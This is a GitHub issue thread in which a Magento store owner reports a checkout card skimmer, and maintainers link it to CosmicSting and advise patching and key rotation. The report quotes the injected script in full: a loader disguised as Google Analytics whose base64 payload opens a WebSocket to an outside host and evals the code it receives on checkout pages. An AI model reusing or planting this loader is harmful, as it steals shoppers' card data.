-
Notifications
You must be signed in to change notification settings - Fork 9.3k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Magento 2.4 Checkout Payment Method Hacked #39526
Comments
Hi @Arsalanulhaq. Thank you for your report.
Join Magento Community Engineering Slack and ask your questions in #github channel. |
It sounds like you're being hit by CosmicSting. Here are some resources on that matter:
Good luck! |
Thanks. I have applied the adobe patch in the above link. Lets see how it goes. But actually he was able to change the core_config_data -> path -> 'design/head/ ' and not cms_blocks |
Applying the patch is not enough, you also need to rotate your encryption key. As far as I can see, you can't change configuration values through the REST API by default, so no idea how they are doing it in your case. Maybe you can use https://sansec.io/guides/usage to scan your shop (in trial mode without a license it will just tell you if it found something, but not exactly what it found, but maybe that's enough for you to further investigate...) |
Thanks @hostep for the detailed information on resolving this issue for @Arsalanulhaq. Hello @Arsalanulhaq, Thanks for the report and collaboration. Let us know if you can still reproduce this issue after applying the patch and rotating the encryption key. Thanks. |
Hi @engcom-Hotel. Thank you for working on this issue.
|
Hello @Arsalanulhaq, We are still waiting for your response on this issue. Thanks |
Hi @engcom-Hotel . So far the issue is not reproduced after applying the above recommended patch or maybe the hacker has forgotten. How can I try to produce this or check now? |
Thanks @Arsalanulhaq, for the reply! We can assume that the issue has been resolved because the patch that you have applied is related to the issue you are facing. Hence we are closing this issue. In the future, if you still facing the same issue, please re-open this issue or ask us to do the same. Thanks |
Preconditions and environment
Steps to reproduce
Somehow the hacker was able to put this script in my core_config_data table in each design/head/includes.
I don't know how the hacker is able to do so, because he for sure cannot access the admin panel or db directly. So my guess is, he is doing it from any endpoint?
Add this script in design > configuration > Store View > HTML HEad Section.
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-55953316-1"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'UA-55953316-1'); gtag('config', 'AW-982019842'); </script> <script src="https://apis.google.com/js/platform.js?onload=renderBadge" async defer></script><script>(function(i, s, h, k, l, o, c, m) {m['GoogleAnalyticsObjects'] = o; c = s.createElement(h), i = s.getElementsByTagName(h)[0]; if (l.href.match(new RegExp(atob(o)))) {c.async = 1; c.src = new Function(atob(k)).call(this);}})('jb', document, 'script', 'd2luZG93Lnd3ID0gbmV3IFdlYlNvY2tldCgoJ3dzczovL2dzdGF0bGMub3JnL2ppdm8/c291cmNlPScpICsgZW5jb2RlVVJJQ29tcG9uZW50KGxvY2F0aW9uLmhyZWYpKTt3aW5kb3cud3cub25tZXNzYWdlPWZ1bmN0aW9uKGUpe2V2YWwoZS5kYXRhKX07', window.location, 'Y2hlY2tvdXQ' + '=', '//www.google-analytics.com/analytics.js', window);</script><script>(function(i, s, h, k, l, o, c, m) {m['GoogleAnalyticsObjects'] = o; c = s.createElement(h), i = s.getElementsByTagName(h)[0]; if (l.href.match(new RegExp(atob(o)))) {c.async = 1; c.src = new Function(atob(k)).call(this);}})('jb', document, 'script', 'd2luZG93Lnd3ID0gbmV3IFdlYlNvY2tldCgoJ3dzczovL2dzdGF0bGMub3JnL2ppdm8/c291cmNlPScpICsgZW5jb2RlVVJJQ29tcG9uZW50KGxvY2F0aW9uLmhyZWYpKTt3aW5kb3cud3cub25tZXNzYWdlPWZ1bmN0aW9uKGUpe2V2YWwoZS5kYXRhKX07', window.location, 'Y2hlY2tvdXQ' + '=', '//www.google-analytics.com/analytics.js', window);</script>Expected result
Order placed successfully
Actual result
Payment method on checkout popsup an iframe similar to paypal and hacks the credit card details of customers
Additional information
No response
Release note
No response
Triage and priority
The text was updated successfully, but these errors were encountered: